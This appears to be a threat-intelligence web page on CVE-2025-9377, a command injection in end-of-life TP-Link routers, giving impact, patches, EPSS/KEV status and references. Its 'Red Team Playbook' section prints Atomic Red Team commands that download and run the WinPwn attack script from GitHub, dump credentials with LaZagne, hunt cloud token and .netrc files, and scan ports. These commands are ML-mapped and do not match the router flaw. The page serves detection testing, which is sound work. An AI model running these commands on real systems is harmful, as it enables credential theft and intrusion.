CVE-2025-9377
Overview
This vulnerability is an authenticated remote command injection in the Parental Control feature of TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 firmware. The root cause lies in improper input validation on the Parental Control page, allowing shell commands to be injected and executed with elevated privileges. The flaw resides specifically in the firmware component handling user inputs on the Parental Control management interface.
Vulnerability Description
The authenticated remote command execution (RCE) vulnerability exists in the Parental Control page on TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9. This issue affects Archer C7(EU) V2: before 241108 and TL-WR841N/ND(MS) V9: before 241108. Both products have reached the status of EOL (end-of-life). It's recommending to purchase the new product to ensure better performance and security. If replacement is not an option in the short term, please use the second reference link to download and install the patch(es).
Impact
An attacker with valid user credentials can execute arbitrary system commands remotely on the affected devices, potentially gaining full control over the router. This enables unauthorized access to network traffic, modification of device configurations, or deployment of persistent malware. The vulnerability requires authentication but no additional user interaction. Exploitation can lead to complete compromise of network security and data confidentiality within environments relying on these routers.
Solution
TP-Link recommends upgrading affected devices to firmware version 241108 or later where available. As both Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 models have reached end-of-life, the vendor advises purchasing newer models for continued security support. For short-term mitigation, users can download and apply patches as detailed in the official advisories at https://www.tp-link.com/us/support/faq/4365/ and https://www.tp-link.com/us/support/faq/4308/. These sources provide step-by-step patch installation instructions specific to the affected firmware versions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting the Parental Control page on specific TP-Link router models allows for authenticated remote command execution (RCE). This flaw arises from improper validation of user inputs, enabling an attacker with valid credentials to execute arbitrary commands on the device. The flaw is particularly concerning as it resides in a critical component of the router's firmware, which is responsible for managing parental controls. The affected models, Archer C7 (EU) V2 and TL-WR841N/ND (MS) V9, have firmware versions prior to 241108 that are susceptible to this issue. Given that both products have reached their end-of-life (EOL), they no longer receive security updates, exacerbating the risk associated with this vulnerability.
Exploitation of this vulnerability can occur through various attack vectors. An attacker who has gained authenticated access to the router's interface can leverage this flaw to execute arbitrary commands, potentially leading to a full compromise of the device. Scenarios may include an attacker gaining access through weak or default credentials, or through social engineering tactics that trick users into providing their login information. Once inside, the attacker could manipulate the router settings, redirect traffic, or even install malicious software, thereby compromising the integrity of the entire network. This type of vulnerability is particularly dangerous as it can be exploited remotely, allowing attackers to operate from anywhere without physical access to the device.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on these routers for their network infrastructure. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential financial losses. For organizations, the risk extends beyond immediate financial implications; it also includes reputational damage and potential legal ramifications due to non-compliance with data protection regulations. Furthermore, as these devices are often used in home environments, the risk of personal data exposure increases, affecting individual users and their privacy.
To detect and mitigate the risk associated with this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to conduct regular security assessments of network devices, including penetration testing and vulnerability scanning, to identify any potential weaknesses. For those still using the affected models, immediate steps should be taken to apply available patches and updates, although the EOL status means that long-term solutions are limited. Organizations should also consider replacing these devices with newer models that offer enhanced security features and ongoing support. Additionally, enforcing strong password policies and educating users about the importance of secure credentials can help mitigate the risk of unauthorized access.
In conclusion, the authenticated remote command execution vulnerability in specific TP-Link router models poses a serious threat to both individual users and organizations. The potential for exploitation through various attack vectors highlights the need for robust security measures and proactive management of network devices. As the landscape of cybersecurity continues to evolve, it is imperative that users remain vigilant and prioritize the security of their network infrastructure to safeguard against emerging threats.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-9377, rising by over 70% to place it near the 96th percentile of exploit likelihood. This elevation reflects growing confidence within the threat community regarding the feasibility and imminence of exploitation, despite the absence of newly disclosed exploit code or active campaign reports. The recent inclusion of this vulnerability in the Known Exploited Vulnerabilities (KEV) catalog further underscores its elevated priority for adversaries, signaling that it is now recognized as a viable target for exploitation efforts. While ransomware involvement remains unconfirmed, the heightened EPSS score suggests that threat actors may increasingly consider leveraging this authenticated remote command execution flaw to gain footholds in affected TP-Link devices, which are already at end-of-life and lack ongoing vendor support. For defenders, this shift necessitates heightened vigilance in monitoring network traffic and access to vulnerable routers, as the risk of compromise has materially increased. Consequently, the overall threat level for CVE-2025-9377 has escalated from a theoretical concern to a more imminent and actionable risk, warranting prioritized attention within security operations despite the lack of direct exploit sightings.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tp-Link | Tl-Wr841n Firmware | All |
cpe:2.3:o:tp-link:tl-wr841n_firmware:*:*:*:*:*:*:*:*
|
|
|
Tp-Link | Tl-Wr841nd Firmware | All |
cpe:2.3:o:tp-link:tl-wr841nd_firmware:*:*:*:*:*:*:*:*
|
|
|
Tp-Link | Archer C7 Firmware | All |
cpe:2.3:o:tp-link:archer_c7_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
44%
|
High | High | |
| CAPEC-6 | Argument Injection |
43%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-9377 |
| tp-link.com |
GitHub CVE
vendor-advisory
|
https://www.tp-link.com/us/support/faq/4365/ |
| tp-link.com |
GitHub CVE
patch
vendor-advisory
|
https://www.tp-link.com/us/support/faq/4308/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-9377 |